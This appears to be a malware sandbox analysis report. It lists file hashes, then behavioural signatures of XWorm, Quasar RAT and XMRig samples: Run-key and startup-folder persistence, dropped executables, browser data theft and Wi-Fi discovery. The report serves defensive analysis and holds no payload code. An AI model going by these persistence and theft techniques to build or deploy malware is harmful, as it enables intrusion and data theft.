SHA1 d82d24b49bd1fd8d9bfcfc21ef92d87dfc296e0b
SHA256 353fa9cd42fc4b3fd1f5110d9caca240288a9c21d5c53ab3902c1c9f97c5f081
SHA512 af4becd3c01dd0dcfd9aedaf817028efa6e5504408ceb0b1d9baaa79720532946643b9c0c764ef61b833a3c1f70c9237f16c3bf6f39dd9ab2c33c0867c50ffa8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b85910f60e03ac318ae6d385fa7567c3
SHA1 36482aa7ecc8af72b9b06ad387232e2c0d6ef662
SHA256 d42917eecc4d4d49823b993666eb40d6849678fdf724a71238c16d744cb26206
SHA512 89435e4472bc6590a1bc3a983a49590110a047c23e592604bd5e40c1e37bc0122025d8b904b01f54fa665a3cdb6edc080f45374569d49c28a0c884beb1cd99bd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 0076526279bad6f48b87df29d93c8198
SHA1 09784f630e60882893b77a6ec5df0e574abdb290
SHA256 d036875940f444d2cf0603ac81726abbfefdc2d5a6bf0852d6e0dfe83067f1f0
SHA512 48cbf72c347aaf1ea23707f45658ca9386e5dfb1fed6c8c3fe56a53ae572e7747bdddbd0af034192bb512726889d21ebeada7d6ba24aa0295500057d99f96985

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dd2e0b582993de8fd19504fd7cf625cf
SHA1 1438136cb58ca0f46447e76ca0c5b464242ea097
SHA256 2053b94262df44b382deee9b97c86c8e829c912415bc252a1ae628d1b32daeff
SHA512 72cfe01038c2e5c3c48087a74273c14f5cfac82b25f1fee40ecddb17779fe391b95fc5fe6f1a809f6b86be20961fdccd4e21544df793c5d3b827827380fec89d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 b2960e082ce87150e53f5d2ad4be8833
SHA1 f36f8a021247599690ce652a948b86c45b80fc16
SHA256 bdb1f5dedbd164e3d2b9881c46923abb602d429fca22e53d9370ac9c53462930
SHA512 5d5ebb02e784de88b07750e3129fa2683276c2177fc512adfb704c4b2f75a24daa04af7e6a02558e30066cd6c623c3ab7212d9038587acb06b573197a796ebd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cbf32db5aef5a6e9c65041d2dab622d9
SHA1 90f35f5341522b1dac5e3e38ea1e256afdc6378f
SHA256 175328b47f399e244cccd9919b9040a87927059cca9901947262cbfb60a83c57
SHA512 2603849f411bc946af8dc0fcf1201b0829d3a25ade5be8e865002fd9a07be2cc7f236669ba39c478056fdd9cbbd5d043d2650f2d21ecf1b92ac1270a75e41183

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 67d0b77a2005e6529c30a42d27d809c7
SHA1 0aed333411d87e7e3226cef0bbe222a57edb1661
SHA256 0d78f432287723a7b9da232b63745905d12e2aa6c5505bba3660e2ac8a3ad509
SHA512 9c24a17888c2df18ac66268a59a4fbfc73d74c241f6a02a1b3bfaa171228635929d60f0a575289e78670bf5f785f67f326ae3add528adb0e3f61848c5b16bbe5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 458f1861e184d55ef4d96b05eed2fb66
SHA1 70db872ea8232600581ce8ddd26a93955de83b43
SHA256 7649fe588036ca9b083f094272b0a7b686e0edc25dd2fc2da14493608ad3abf3
SHA512 ea77c2a1783abfebb2edcdd0bd55566a88f8d05d69626c60dc883c2edf61985572744e300f462afeaece87993ace853651685615ab7dca56030f67c37c661980

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1a98274bfa86069be7b0dbb8dcf167a0
SHA1 015c7e8839830f394ecfa783b3c6aa3f182616f8
SHA256 2ae2e64444ccf61d904020c5a4b516ba8f02bc4fd113ca999481977eb544531d
SHA512 748bd0b92078cf6b80b7c2dfce8c6fb2117f2e9286eb63335fdad35d903dc6e8fe8221ca32608aea6147f7668185e8b9d8136af8c2cbc3369e4e551edb4c3650

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

MD5 d1f9a1a945298dc40fa5c98ba379c77d
SHA1 96b527884a744c8d37a9d5f1d26e83bd3cf38da2
SHA256 f06c9c32e7e5efff0e137b68bebcb3c3cee87578f20f6e5692c0c0c472f241bc
SHA512 f91bc378ef7ee5d7b1fe0526e6bc6bb307d05e57df17fc62de277cf2d05da8f4821f2154334185024bc371162355c708b719d21bca54aa86a08185a7bc27d1d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

MD5 c626ad11649c79e3fd021247d60eb1af
SHA1 12a27ce93a15941c82712138c49c09b70fb0d7a4
SHA256 0b486accc79f7bf758bebfac8c94df1b45fc0abd218b7df8a4ff950d6a8633f9
SHA512 690ac7b44bd55210848352d9adbce3c7cf9faa7fd75fe7e701722e5ce598ab026b88e809cd296222ff0a3ccece2f8a8a6a654e71fc9c509db28e3ae5fdcc1a37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

MD5 e30c8acefa2c4297eb1ec8f7d5154e18
SHA1 9dd81a5adfd2c00bf2a346ab341131db13745957
SHA256 d850bb6bd280a6ca96adee87974d99cee6af09c11af17a51d9486d3a732fbb3d
SHA512 1e31c247dfa9acc261131ae46a96153b7fd83f141f555c4252239187be9108613b59be77d436349e42bf9e181acf37db6d22957c56e792e6d10cd1aaa67e4e51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

MD5 61c83dfd5f24c2d83f36b4d57a2b0b78
SHA1 92a17768440a7f0882550b7425ad4c1821c46328
SHA256 30686e7d2547790ac5bf8d87c0b4a0eb6f3282ea15097ee5565a326e7794b57a
SHA512 38ce4f1754422109afa5b9e33e1eb00dac82c7d657062959107468e74153fd19d53ee4c232cdd2ee8a1ab5320d1cb9f0f2c01a25fb1cdc1616413307c1c14728

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

MD5 2655aa40d903b6e2c13f1a9715a68b15
SHA1 85acf76f1117730ac9c0c8ef120ee5168330dd7a
SHA256 4c596282fab16f2720c1dfc35c79236d7e9f7741742a96744d4666cf2ac7355f
SHA512 2934f9bdceefa02462ddd98d64e6fdc8f677725760dc8ef209bed56548c5f017688d2436d1033844e61cb0f651a68f4d5040bd3c9395ae178179a34d3e04fa04

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 f03fa59413375068ade61faf7a993ce1
SHA1 71b7a64a6c357e8585c2ab4142499e51c346fb77
SHA256 dc07756791fb5e3f19d37bff28c8f542d5415cecfdc72192c07b31d4cb7f48ca
SHA512 cc1cf3c68e3d61b66f539e50b1bbe07b93734f9ab86d2fbd8f3f3c18cb1b8ed7f7b110fa179ed153ff51a40c389dd27f316674b6c222af8c612eb9362a573a4b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

MD5 a6ed6b45dad3d9c439fff83c2695be38
SHA1 4418a8bf205652dfd0a04272c1b9ef6b65e41938
SHA256 78b6849ce51328c8f69f6b6cbd532c861cd53eba60df68972c65122bda98e2ea
SHA512 41bd3ed160c11a412973bc7d4cf8906c03c7c38a06cb75e68f8ca1ba7a9de8d2429d75852117539a10cb94b905944d5ae302e760859bcaca16597555c38288c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

MD5 62f13551681b6458bbc711c8b52cb7ab
SHA1 1de05426e07f486a436465f43180f3126f325dde
SHA256 215ec52c8e80c69fb6c2f7323153bfb04c8bfe090c248f84defa05de66313706
SHA512 92509a1540c4051f652164bf308a9712462589ec7122ed934b2438aead86020652dc5cc474d24389b79883b7d37fab5f0345565d022452f659c9fb202dba47f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

MD5 b5781c95d34c86654d040027ea2d6853
SHA1 2ab83bada6335a2aa40e7b828fae69aebd2cc85f
SHA256 7099407217378f6593f672ee6231853742e864647aed01f49cc13ef08d93899b
SHA512 f32502abbeeff587eb633cdfe9a6d0f577fdfc33a412493338b65683aea220eb474460b2a7e0f34eefc0b1117f960b216bdeb06efd80c866648c5a4f0728a5ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 3e45022839c8def44fd96e24f29a9f4b
SHA1 c798352b5a0860f8edfd5c1589cf6e5842c5c226
SHA256 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
SHA512 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 59d3e3ccb8d73684023b287c1dc4650a
SHA1 f989d6d53547697667335762bd843a6b26ea04f5
SHA256 da635f10f1c92925f0579ebbfaccfe6512a81255722740213808bc39ebf5c6c7
SHA512 038d405074d54756d8b0daafdfb6d0b9382bbfc40b2a2e630b92fcf797fca05e987d1c3ae0e0240f21d55216f51d3c0bdd88a7bc6ebea11b72ac1fca36309e28

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 02fa9cfba0efa98d9cecef5c87ce62d5
SHA1 697d65a9e5f14e4fdd2258d9dda600085ba95edb
SHA256 c95e3888ecc710ae7446109296f1aabfd46beee7f8a564ca93024b410af77c85
SHA512 9c98f4bfb3d98fa49659ee59e83b0d7465631f902769a412db3586e7a0148dd24eacc83c4428e48ff4726909e72cbf12cc31ff277b0df58fbb951b32244cd0f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594472.TMP

MD5 1a0a456f856873a5a9309edce3fab473
SHA1 b92d8b78a34ab62e40fff4005b49474881fbe3b6
SHA256 03c3497adcbeabdccf628f44b1177f89f94879a5a773ffaf0bedfba6e29ee60e
SHA512 c8d344bd9f7297f88ce61dd28e5c5a2b9ac0f3d4ba074d7a576ea711914de9027677d58c547fdac58ee45216945b44e6d91293b42256ff819f035749b042fc46

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8f8d03cca457b9c2f8d0167411ddbe73
SHA1 c141c820fedc664b81655efe9a045b9d229a016e
SHA256 03f76d380b89410221fc5ffa00d2f335bdaf09359fee8495349e36924dfac214
SHA512 9cc003af1410d6c3ba6af018aef8d7df2058b7686be0343fd2fa179fcb4b75ee23541f041d36213f3ec2c18c71826cd91d94433278f724f8093b65b4e0715e76

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 70a873ad9a8fd76dd48ed67b696206e2
SHA1 c424ff332aef2d8c490db3416b2895378b565251
SHA256 b2a76595f7bbcf3c8cf3705fc9cf5edb5adb318cec0f46bcaf3686aa8cc56b4d
SHA512 5b2d5761d8711613098d8bd9755a38a5885ea26d79a05f13bd3bd9272ee36abecdc23d207a6085f87601851b56dd9a48668618b9f4827d9c99f0312299988bc5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 3cd06142a6586b107f2d183974b05df4
SHA1 2314946576fa7a69502637715e661f1018556f19
SHA256 279933b64d87df5d6ca9b098431c606594e52d025a0bcffc5430055ca1d41b84
SHA512 0c959f0436220350e294d86724c885da0a7ae08249acad29db5846c605b65ab379eaf51f5e52728518a71e6436dbad8dd8103e85a3d059322eeb0ed3567a6556

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 41a7f079e85c2a4f54e1052247b077a3
SHA1 9afc19e2362b26cdaa9bf0edf833fa921f94aedb
SHA256 96bac7a7fe2f09187e96e566d0cc74c18d52c5581091b10bd4e12979e4b682d7
SHA512 7ac203a83e3f0fd6eb3a39a753f715e9f22247dd3cc55dfa01107926d4a780a4d92eb40a396dd55593c68010661d31a8f63447fa5c5d63a48c5c79c4de9576b5

memory/5876-2431-0x0000000000220000-0x000000000028A000-memory.dmp

memory/1060-2505-0x0000000000DC0000-0x0000000000DCA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 f1c3f0c151b4b375a7b6f0a934b9e0d2
SHA1 e1550ea133d153e7e13ddeb6a7ed19fd1c2ce22c
SHA256 7c7f38ad559e020bf8843ab9c5413acc3ab42786054a7c56d0c1b6e84ce5d75c
SHA512 8bc1791dcbd7aa19ace144fe7d7b997d2f41e98c4c7cac1206254b393e591ffef6d7ccc19de055c96558641e22fc9aeb2954f269da83068473309c0388b7d77d

memory/3880-2681-0x00007FF973520000-0x00007FF973FE1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-03 16:15

Reported

2025-05-03 16:18

Platform

win11-20250502-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5316 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 908 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

defense_evasion execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe C:\Windows\CompPkg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" C:\Windows\CompPkg.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\CompPkg.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\systemprocess.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
File created C:\Windows\host.exe C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\primate protocol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
